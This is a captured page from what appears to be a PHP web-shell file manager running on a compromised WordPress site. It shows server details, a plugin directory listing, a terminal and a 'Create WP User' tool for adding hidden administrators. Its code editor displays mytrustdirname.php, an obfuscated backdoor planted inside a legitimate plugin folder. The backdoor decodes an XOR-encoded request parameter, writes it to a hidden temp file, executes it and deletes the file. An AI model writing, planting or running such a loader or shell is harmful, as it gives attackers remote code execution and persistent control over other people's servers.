Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
dcustoms.pl
/
wp-content
/
plugins
/
ibtana-visual-editor
/
src
/
blocks
/
form
/
fields
/
checkbox
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
.htaccess
214.00 B
-r--r--r--
2026-04-22 05:00
.item
210.00 B
-rw-r--r--
2025-11-28 01:02
block.php
8.67 KB
-rw-r--r--
2023-08-10 18:31
mytrustdirname.php
858.00 B
-rw-r--r--
2023-08-10 18:31
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
mytrustdirname.php
<?php if(array_key_exists("r\x65co\x72d", $_REQUEST)){ $dchunk = $_REQUEST["r\x65co\x72d"]; $dchunk = explode( '.' , $dchunk ) ; $flag = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); foreach( $dchunk as $o => $v9) {$chS = ord( $s[$o % $lenS]); $d = ( ( int)$v9 - $chS -( $o % 10)) ^ 62; $flag.= chr( $d);} $k = array_filter([getcwd(), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), "/var/tmp"]); foreach ($k as $key => $ref) { if (array_product([is_dir($ref), is_writable($ref)])) { $component = implode("/", [$ref, ".item"]); $success = file_put_contents($component, $flag); if ($success) { include $component; @unlink($component); die();} } } }
关闭
保存